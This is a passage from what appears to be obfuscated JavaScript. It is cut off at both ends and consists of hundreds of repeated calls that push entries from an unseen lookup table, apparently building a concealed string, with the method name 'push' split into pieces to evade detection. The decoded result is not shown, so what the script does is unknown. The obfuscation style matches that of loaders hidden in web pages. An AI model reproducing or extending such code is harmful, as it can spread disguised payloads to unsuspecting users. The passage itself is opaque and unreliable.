"u"+"sh"]\($[46]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[23]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[70]\);s["p"+"u"+"sh"]\($[49]\);s["p"+"u"+"sh"]\($[23]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[21]\);s["p"+"u"+"sh"]\($[74]\);s["p"+"u"+"sh"]\($[14]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[52]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[12]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[52]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[37]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[52]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[49]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[62]\);s["p"+"u"+"sh"]\($[69]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[23]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[49]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[62]\);s["p"+"u"+"sh"]\($[69]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[23]\);s["p"+"u"+"sh"]\($[1]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[21]\);s["p"+"u"+"sh"]\($[74]\);s["p"+"u"+"sh"]\($[14]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[49]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[62]\);s["p"+"u"+"sh"]\($[69]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[23]\);s["p"+"u"+"sh"]\($[47]\);s["p"+"u"+"sh"]\($[47]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[11]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[23]\);s["p"+"u"+"sh"]\($[59]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[49]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[62]\);s["p"+"u"+"sh"]\($[69]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[23]\);s["p"+"u"+"sh"]\($[55]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[23]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[47]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[23]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[48]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[34]\);s["p"+"u"+"sh"]\($[18]\);s["p"+"u"+"sh"]\($[65]\);s["p"+"u"+"sh"]\($[0]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[2]\);s["p"+"u"+"sh"]\($[13]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[29]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[29]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[13]\);s["p"+"u"+"sh"]\($[65]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[34]\);s["p"+"u"+"sh"]\($[18]\);s["p"+"u"+"sh"]\($[65]\);s["p"+"u"+"sh"]\($[0]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[2]\);s["p"+"u"+"sh"]\($[13]\);s["p"+"u"+"sh"]\($[19]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[4]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[65]\);s["p"+"u"+"sh"]\($[1]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[52]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[11]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[34]\);s["p"+"u"+"sh"]\($[18]\);s["p"+"u"+"sh"]\($[65]\);s["p"+"u"+"sh"]\($[0]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[2]\);s["p"+"u"+"sh"]\($[13]\);s["p"+"u"+"sh"]\($[47]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[34]\);s["p"+"u"+"sh"]\($[18]\);s["p"+"u"+"sh"]\($[65]\);s["p"+"u"+"sh"]\($[0]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[2]\);s["p"+"u"+"sh"]\($[13]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[48]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[34]\);s["p"+"u"+"sh"]\($[18]\);s["p"+"u"+"sh"]\($[65]\);s["p"+"u"+"sh"]\($[0]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[2]\);s["p"+"u"+"sh"]\($[13]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[29]\);s["p"+"u"+"sh"]\($[0]\);s["p"+"u"+"sh"]\($[19]\);s["p"+"u"+"sh"]\($[29]\);s["p"+"u"+"sh"]\($[47]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[34]\);s["p"+"u"+"sh"]\($[18]\);s["p"+"u"+"sh"]\($[65]\);s["p"+"u"+"sh"]\($[0]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[2]\);s["p"+"u"+"sh"]\($[13]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[19]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[19]\);s["p"+"u"+"sh"]\($[54]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[19]\);s["p"+"u"+"sh"]\($[4]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[50]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[34]\);s["p"+"u"+"sh"]\($[18]\);s["p"+"u"+"sh"]\($[65]\);s["p"+"u"+"sh"]\($[0]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[2]\);s["p"+"u"+"sh"]\($[13]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[48]\);s["p"+"u"+"sh"]\($[48]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[43]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[4]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[19]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[4]\);s["p"+"u"+"sh"]\($[50]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[50]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[19]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[13]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[38]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[19]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[5]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[4]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[19]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[65]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[21]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[1]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[43]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[4]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[19]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[4]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[65]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[47]\);s["p"+"u"+"sh"]\($[47]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[11]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[43]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[4]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[59]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[55]\);s["p"+"u"+"sh"]\($[19]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[71]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[61]\);s["p"+"u"+"sh"]\($[15]\);s["p"+"u"+"sh"]\($[5]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[61]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[11]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[43]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[4]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[59]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[55]\);s["p"+"u"+"sh"]\($[19]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[48]\);s["p"+"u"+"sh"]\($[48]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[51]\);s["p"+"u"+"sh"]\($[51]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[72]\);s["p"+"u"+"sh"]\($[72]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[1]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[19]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[40]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[11]\);s["p"+"u"+"sh"]\($[4]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[48]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[19]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[11]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[48]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[51]\);s["p"+"u"+"sh"]\($[51]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[72]\);s["p"+"u"+"sh"]\($[72]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[1]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[19]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[11]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[52]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[48]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[9]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[19]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[51]\);s["p"+"u"+"sh"]\($[51]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[1]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[19]\);s["p"+"u"+"sh"]\($[40]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[51]\);s["p"+"u"+"sh"]\($[51]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[9]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[19]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[51]\);s["p"+"u"+"sh"]\($[51]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[1]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[19]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[11]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[11]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[19]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[61]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[32]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[26]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[23]\);s["p"+"u"+"sh"]\($[23]\);s["p"+"u"+"sh"]\($[23]\);s["p"+"u"+"sh"]\($[23]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[61]\);s["p"+"u"+"sh"]\($[70]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[13]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[69]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[48]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[65]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[19]\);s["p"+"u"+"sh"]\($[41]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[4]\);s["p"+"u"+"s